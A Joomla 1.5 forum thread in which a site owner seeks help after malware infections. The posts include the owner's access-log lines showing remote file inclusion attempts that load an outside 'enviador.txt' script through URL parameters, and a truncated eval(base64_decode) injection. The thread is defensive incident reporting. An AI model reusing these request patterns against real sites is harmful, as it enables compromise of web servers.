The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 7 posts ] 
  Print view Previous topic | Next topic 
Author Message
Westernfront
PostPosted: Wed Mar 07, 2012 5:54 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Mar 07, 2012 5:26 pm
Posts: 7
I'm not looking for advice per se (but any would be appreciated), as I'll probably bite the bullet and try to port over to joomla 2.5 while I'm having to reinstall anyway, but thought maybe this information might be helpful to the developers. It may already have been covered in security updates, I'm not sure.

Anyway, my site has been repeatedly suspended by the hosting provider - they do regular scans and malware has been detected. I upgrade joomla etc and change the passwords but then it happens again. Admittedly, I thought I had the latest version but then after found out that their cpanel / fantastico was only up to 1.5.23

What was happening was that code along the lines of eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk.... etc.. was being inserted to the top of a number of pages. At first it was just index.php, index2.php and defines.php

I found in the access logs what I believe to be the source so thought I'd share it here:

202.153.163.65 - - [05/Mar/2012:23:52:44 +1100] "GET /index.php?option=http://www.<malicioussite>.com/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

xg.com.au being my site, obviously. I also found this page where someone has dissected some of the malicious code: http://206.214.216.120/forum/viewthread ... ad_id=1035

Hope this is helpful for someone. I'll just take my database and start the arduous task of starting from scratch.


Last edited by mandville on Wed Mar 07, 2012 7:43 pm, edited 1 time in total.
altered sites breached


Top
 Profile  
 
mandville
PostPosted: Wed Mar 07, 2012 7:42 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11641
Location: The Girly Side of Joomla in Sussex
now those logs show that was a 404 meaning the file wasnt found, unless you find similar with a 200 code

also if i said the letters libwww would you jump up and down shouting - "thats it"
run the fpa if you can viewforum.php?f=621

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
Westernfront
PostPosted: Thu Mar 08, 2012 2:58 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Mar 07, 2012 5:26 pm
Posts: 7
If you said libwww I wouldn't know what you were talking about - I'm not all up on the technical side of these things. I just looked at the access logs from between when I understood the site to be clear and when the hosting provider suspended it. I went back from there and that was the closest suspicious thing to that event that I found.

I'll try running that fpa but not sure if it will be successful as a heap of the joomla files have been quarantined. Thanks for the advice!
Top
 Profile  
 
mandville
PostPosted: Thu Mar 08, 2012 9:10 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11641
Location: The Girly Side of Joomla in Sussex
just see if that is mentioned in your logs.
also run through the checklist linked

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
Westernfront
PostPosted: Thu Mar 08, 2012 5:20 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Wed Mar 07, 2012 5:26 pm
Posts: 7
Ok ran through the checklist as best I could, and ran the FPA - output included below.

I couldn't find libwww in the logs but I did find more entries from that <self-censored>, including one with a 200 code (3rd entry). These were all the pertinent entries (hid the host details as above):

Code:
202.153.163.65 - - [05/Mar/2012:23:52:44 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

60.251.136.8 - - [06/Mar/2012:01:21:20 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

218.219.159.104 - - [06/Mar/2012:03:51:29 +1100] "GET /forum/index.php?board=http://<malicioussite2>/img/suites/enviador.txt?&servidor=www.xg.com.au/forum/index.php?board=&para=premmy35@gmail.com HTTP/1.1 " 200 48568 "-" "-"

218.219.159.104 - - [06/Mar/2012:04:22:14 +1100] "GET /index.php?option=http://<malicioussite2>/img/suites/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 404 1390 "-" "-"

60.251.136.8 - - [06/Mar/2012:06:46:14 +1100] "GET /index.php?view=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?view=&para=premmy35@gmail.com HTTP/1.1 " 302 361 "-" "-"

60.251.136.8 - - [06/Mar/2012:10:35:42 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:11:49:30 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:12:06:35 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:15:00:17 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:16:00:25 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"

60.251.136.8 - - [06/Mar/2012:16:51:11 +1100] "GET /index.php?option=http://<malicioussite1>/files/enviador.txt?&servidor=www.xg.com.au/index.php?option=&para=premmy35@gmail.com HTTP/1.1 " 302 365 "-" "-"



Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 9th March 2012 wrote:
[07-Mar-2012 20:43:27] PHP Fatal error: require_once() [<a href=\'function.require\'>function.require</a>]: Failed opening required \'/home/wf48951/public_html/includes/framework.php\' (include_path=\'.:/usr/local/lib/php/PEAR:/usr/lib/php:/usr/local/lib/php\') in /home/wf48951/public_html/index.php on line 22
Forum Post Assistant (v1.2.0) : 9th March 2012 wrote:
Basic Environment :: wrote:
Joomla! Instance :: Joomla! 1.5.23-Stable (senu takaa ama baji) 04-March-2011
Joomla! Configured :: Yes | Read-Only (444) | Owner: wf48951 (uid: 32113/gid: 32114) | Group: wf48951 (gid: 32114) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 0 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 0 | FTP Layer: 0 | SSL: 0 | Error Reporting: -1 | Site Debug: 0 | Language Debug: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.19.1.el5xen | Technology: i686 | Web Server: Apache | Encoding: gzip,deflate,sdch | Doc Root: /home/wf48951/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 07th March 2012 20:43:27. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 10M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 32M

MySQL Configuration :: Version: 5.0.92-community-log (Client:5.0.92) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.06 MiB | #of _FPA_TABLE: 62
Detailed Environment :: wrote:
PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | hash (1.0) | filter (0.11.0) | ftp () | gd () | session () | iconv () | standard (5.2.17) | json (1.2.1) | mbstring () | mcrypt () | mhash () | mysql (1.0) | SimpleXML (0.1) | posix () | pspell () | Reflection (0.1) | imap () | SPL (0.2) | mysqli (0.1) | soap () | sockets () | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | zip (1.8.11) | cgi () | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: No | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:
Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered :: wrote:
Templates :: SITE :: JA_Purity (1.2.0) | WF1.5 (1.5.0) | beez (1.0.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: Khepri (1.0) |


Top
 Profile  
 
mandville
PostPosted: Thu Mar 08, 2012 6:09 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 11641
Location: The Girly Side of Joomla in Sussex
let us look at this the other way round. was the enviador file found on your server? in a "files" folders? as it could be that it was uploaded to you and you are being used as the malicious middle man.

thats why there are so many 404/302 (not found) errors

on the basis that you have followed the checklist 7 safe route to recovery, then install akeeba admin tolls and check/reset all the permissions.
follow the rest of the checklist esp the cron part

would also like to see your extensions list

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}
Top
 Profile  
 
cyberplasma
PostPosted: Tue Mar 13, 2012 3:16 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Tue Mar 13, 2012 3:10 pm
Posts: 1
Hello,

I am not running joomla but I frequently detect hacking attempts in my websites using the enviador.txt script originating from Joomla websites. I have been trying to call Google to have this e-mailaddress premmy35@gmail.com blocked and legal actions need to be taken against this person(s). I filled in the abuse form but nothing ensued from it.

Can anyone help? This needs to stop now!

Do I need to call the FBI???

Sincerely,
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 7 posts ] 


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Who is online

Users browsing this forum: No registered users and 23 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group